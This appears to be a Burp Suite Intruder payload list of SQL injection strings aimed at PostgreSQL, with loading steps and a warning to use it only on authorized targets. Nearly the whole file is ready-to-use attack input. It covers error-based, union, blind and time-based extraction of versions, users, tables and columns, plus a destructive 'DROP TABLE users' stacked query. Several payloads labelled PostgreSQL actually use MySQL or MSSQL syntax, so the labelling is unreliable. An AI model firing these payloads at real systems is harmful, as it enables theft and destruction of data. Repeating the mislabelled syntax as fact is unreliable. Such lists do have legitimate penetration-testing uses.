# ============================================================================
# BURP SUITE INTRUDER PAYLOAD LIST
# Tool    : SQL Injection Payload Generator
# Author  : Offensive Team Zeta - ITSOLERA (PVT) LTD
# Created : 2026-02-20 18:30:04
# Target  : POSTGRESQL database
# Usage   : Burp Suite > Intruder > Payloads > Load > (this file)
# WARNING : Use ONLY on authorized targets with written permission
# ============================================================================

# HOW TO USE:
#   1. Open Burp Suite → Proxy → Intercept a request
#   2. Right-click → Send to Intruder
#   3. Intruder → Positions → mark your injection point (Add §)
#   4. Intruder → Payloads → Payload type: Simple list
#   5. Click Load → select this file
#   6. Click Start Attack (authorized lab / DVWA ONLY)

# ============================================================================
# ERROR BASED — POSTGRESQL
# ============================================================================
# [Easy] Extract PostgreSQL version through CAST error
1' AND CAST((SELECT version()) AS int)--
# [Medium] Extract version using double cast syntax
1' AND (SELECT ((SELECT version())::int))--
# [Medium] Extract current user and version combined
1' AND CAST(CONCAT((SELECT current_user), (SELECT version())) AS int)--
# [Hard] Extract all table names from public schema
1' AND (SELECT (SELECT array_agg(tablename) FROM pg_tables WHERE schemaname='public')::int)--

# ============================================================================
# UNION BASED — POSTGRESQL
# ============================================================================
# [Easy] Extract basic PostgreSQL information
1' UNION SELECT version(), current_user, current_database(), NULL--
# [Medium] List all tables in public schema
1' UNION SELECT tablename, NULL, NULL, NULL FROM pg_tables WHERE schemaname='public'--
# [Medium] Extract columns from users table
1' UNION SELECT column_name, data_type, NULL, NULL FROM information_schema.columns WHERE table_name='users'--
# [Hard] Aggregate all tables and schemas
1' UNION SELECT string_agg(tablename, ', '), string_agg(schemaname, ', '), NULL, NULL FROM pg_tables--

# ============================================================================
# BOOLEAN BLIND — POSTGRESQL
# ============================================================================
# [Hard] Boolean blind: Verify database accessibility
1' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--
# [Hard] Boolean blind: Extract username length
1' AND (SELECT LENGTH(user())) > 5--
# [Very Hard] Boolean blind: Check username patterns
1' AND (SELECT COUNT(*) FROM users WHERE username LIKE 'a%') > 0--
# [Hard] Boolean blind: Table record counting
1' AND (SELECT CASE WHEN (SELECT COUNT(*) FROM users) > 100 THEN 1 ELSE 0 END) = 1--

# ============================================================================
# TIME BASED — POSTGRESQL
# ============================================================================
# [Hard] Time-based blind: Sleep function delay
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
# [Hard] Time-based blind: Conditional sleep based on count
1' AND IF((SELECT COUNT(*) FROM users) > 10, SLEEP(5), 0)--
# [Very Hard] Time-based blind: MSSQL WAITFOR command
1' OR 1=1; WAITFOR DELAY '00:00:05'--
# [Very Hard] Time-based blind: PostgreSQL pg_sleep function
1' AND (SELECT CASE WHEN (SUBSTRING(user(),1,1)='a') THEN pg_sleep(5) ELSE pg_sleep(0) END)--

# ============================================================================
# COMMENT BYPASS — POSTGRESQL
# ============================================================================
# [Easy] Basic quote bypass without comments
1' OR '1'='1
# [Easy] Hash comment (#) bypass in MySQL
1' UNION SELECT NULL#
# [Easy] Block comment bypass (/*...*/)
1' UNION SELECT NULL,NULL/*
# [Medium] Stacked query comment bypass
1'; DROP TABLE users; --
# [Easy] PostgreSQL double-dash comment bypass
1' AND '1'='1' --
# [Easy] MSSQL comment bypass
1' OR '1'='1' /*

